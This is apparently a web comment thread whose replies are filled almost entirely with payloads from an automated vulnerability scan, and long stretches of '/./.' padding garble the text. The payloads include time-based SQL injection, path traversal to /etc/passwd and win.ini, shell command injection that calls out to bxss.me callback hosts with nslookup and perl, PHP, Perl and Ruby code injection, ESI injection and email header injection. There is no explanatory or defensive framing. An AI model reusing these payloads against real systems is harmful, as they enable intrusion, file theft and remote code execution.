/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
&(nslookup hitvoncdxbjnf9619a.bxss.me||perl -e "gethostbyname('hitvoncdxbjnf9619a.bxss.me')")&'\"`0&(nslookup hitvoncdxbjnf9619a.bxss.me||perl -e "gethostbyname('hitvoncdxbjnf9619a.bxss.me')")&`'
re: Leo Saito
file:///etc/passwd
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
|(nslookup hitnbfkrvaxgj5c946.bxss.me||perl -e "gethostbyname('hitnbfkrvaxgj5c946.bxss.me')")
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
/etc/shells
re: Leo Saito
`(nslookup hitdpbloouhgn8216b.bxss.me||perl -e "gethostbyname('hitdpbloouhgn8216b.bxss.me')")`
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
;(nslookup hitbrsrynvfyj52668.bxss.me||perl -e "gethostbyname('hitbrsrynvfyj52668.bxss.me')")|(nslookup hitbrsrynvfyj52668.bxss.me||perl -e "gethostbyname('hitbrsrynvfyj52668.bxss.me')")&(nslookup hitbrsrynvfyj52668.bxss.me||perl -e "gethostbyname('hitbrsrynvfyj52668.bxss.me')")
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
bxss.me
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
'.gethostbyname(lc('hitin'.'bdxgevge43ee4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(75).chr(112).chr(67).'
re: Leo Saito
".gethostbyname(lc("hitfl"."mnrofrha5c93a.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(84).chr(99).chr(73)."
re: Leo Saito
)
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(105).concat(82).concat(121).concat(70)+(require"socket"
Socket.gethostbyname("hitzo"+"voxsxfia72a64.bxss.me.")[3].to_s)+"
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(104).concat(89).concat(109).concat(88)+(require'socket'
Socket.gethostbyname('hitdj'+'vwdpzbnvff47e.bxss.me.')[3].to_s)+'
re: Leo Saito
'"
re: Leo Saito
<!--
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+386-386-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+386-386-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+154-154-1=0+0+0+1
re: Leo Saito
-1 OR 3+154-154-1=0+0+0+1
re: Leo Saito
-1' OR 2+883-883-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+883-883-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+50-50-1=0+0+0+1 or 'n4WXWLlo'='
re: Leo Saito
-1' OR 3+50-50-1=0+0+0+1 or 'n4WXWLlo'='
re: Leo Saito
-1" OR 2+792-792-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+792-792-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
SIER90fv'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 207=(SELECT 207 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 432=(SELECT 432 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 232=(SELECT 232 FROM PG_SLEEP(15))--
re: Leo Saito
SpPlqGSz' OR 656=(SELECT 656 FROM PG_SLEEP(15))--
re: Leo Saito
uGG0PlRo') OR 908=(SELECT 908 FROM PG_SLEEP(15))--
re: Leo Saito
LIcV4WQN')) OR 118=(SELECT 118 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@Lv669
Thank you very much
re: Justeat
qj7VhAnn
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+319-319-1=0+0+0+1
re: Justeat
-1 OR 3+319-319-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
1ukZ2w5p
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+687-687-1=0+0+0+1
re: Justeat
-1 OR 3+687-687-1=0+0+0+1
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
XPbfP0SD'; waitfor delay '0:0:15' --
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-5 OR 76=(SELECT 76 FROM PG_SLEEP(15))--
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
-5) OR 998=(SELECT 998 FROM PG_SLEEP(15))--
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
-1)) OR 521=(SELECT 521 FROM PG_SLEEP(15))--
re: Justeat
PAxS2yI0'; waitfor delay '0:0:15' --
re: Justeat
3MJczGxm' OR 477=(SELECT 477 FROM PG_SLEEP(15))--
re: Justeat
-5 OR 236=(SELECT 236 FROM PG_SLEEP(15))--
re: Justeat
fHfQswI5') OR 152=(SELECT 152 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 141=(SELECT 141 FROM PG_SLEEP(15))--
re: Justeat
TAwObZAi')) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 758=(SELECT 758 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
polsIknz' OR 832=(SELECT 832 FROM PG_SLEEP(15))--
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
HudRFFgO') OR 713=(SELECT 713 FROM PG_SLEEP(15))--
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
hMI5zbkj')) OR 702=(SELECT 702 FROM PG_SLEEP(15))--
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@X0ByO
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@3NQtd
re: Justeat
1SnDESCEO
re: Justeat
response.write(9753464*9966557)
re: Justeat
'+response.write(9753464*9966557)+'
re: Justeat
%0abcc:074625.67-16715.67.6928c.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-16716.67.6928c.19990.2@bxss.me
re: Justeat
"+response.write(9753464*9966557)+"
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
${10000327+9999889}
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
/etc/passwd
re: Justeat
echo qlomvb$()\ xmffti\nz^xyu||a #' &echo qlomvb$()\ xmffti\nz^xyu||a #|" &echo qlomvb$()\ xmffti\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
&echo fbebiq$()\ oscjep\nz^xyu||a #' &echo fbebiq$()\ oscjep\nz^xyu||a #|" &echo fbebiq$()\ oscjep\nz^xyu||a #
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
|echo nntrku$()\ eetaqj\nz^xyu||a #' |echo nntrku$()\ eetaqj\nz^xyu||a #|" |echo nntrku$()\ eetaqj\nz^xyu||a #
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
)
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
(nslookup hitdjwznithrf99d51.bxss.me||perl -e "gethostbyname('hitdjwznithrf99d51.bxss.me')")
re: Justeat
!(()&&!|*|*|
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
$(nslookup hitaxfvmzpkvgb60d3.bxss.me||perl -e "gethostbyname('hitaxfvmzpkvgb60d3.bxss.me')")
re: Justeat
^(#$!@#$)(()))******
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
&nslookup hitdjpymecxmff24c3.bxss.me&'\"`0&nslookup hitdjpymecxmff24c3.bxss.me&`'
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
&(nslookup hitlqhyxdgowm87c10.bxss.me||perl -e "gethostbyname('hitlqhyxdgowm87c10.bxss.me')")&'\"`0&(nslookup hitlqhyxdgowm87c10.bxss.me||perl -e "gethostbyname('hitlqhyxdgowm87c10.bxss.me')")&`'
re: Justeat
file:///etc/passwd
re: Justeat
|(nslookup hityworygonys800c6.bxss.me||perl -e "gethostbyname('hityworygonys800c6.bxss.me')")
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
`(nslookup hitfxdpswimow11401.bxss.me||perl -e "gethostbyname('hitfxdpswimow11401.bxss.me')")`
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
/WEB-INF/web.xml
re: Justeat
;(nslookup hittxvzbveygh46e2e.bxss.me||perl -e "gethostbyname('hittxvzbveygh46e2e.bxss.me')")|(nslookup hittxvzbveygh46e2e.bxss.me||perl -e "gethostbyname('hittxvzbveygh46e2e.bxss.me')")&(nslookup hittxvzbveygh46e2e.bxss.me||perl -e "gethostbyname('hittxvzbveygh46e2e.bxss.me')")
re: Justeat
'.gethostbyname(lc('hitcq'.'wuvngtwp19b3c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(88).chr(106).chr(82).'
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
".gethostbyname(lc("hitki"."clysistj99708.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(65).chr(98).chr(71)."
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
/etc/shells
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
c:/windows/win.ini
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
bxss.me
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(105).concat(73).concat(106).concat(68)+(require"socket"
Socket.gethostbyname("hitsj"+"sgfndpke9d5b1.bxss.me.")[3].to_s)+"
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(98).concat(75).concat(118).concat(87)+(require'socket'
Socket.gethostbyname('hitai'+'agqzrwkqf0746.bxss.me.')[3].to_s)+'
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.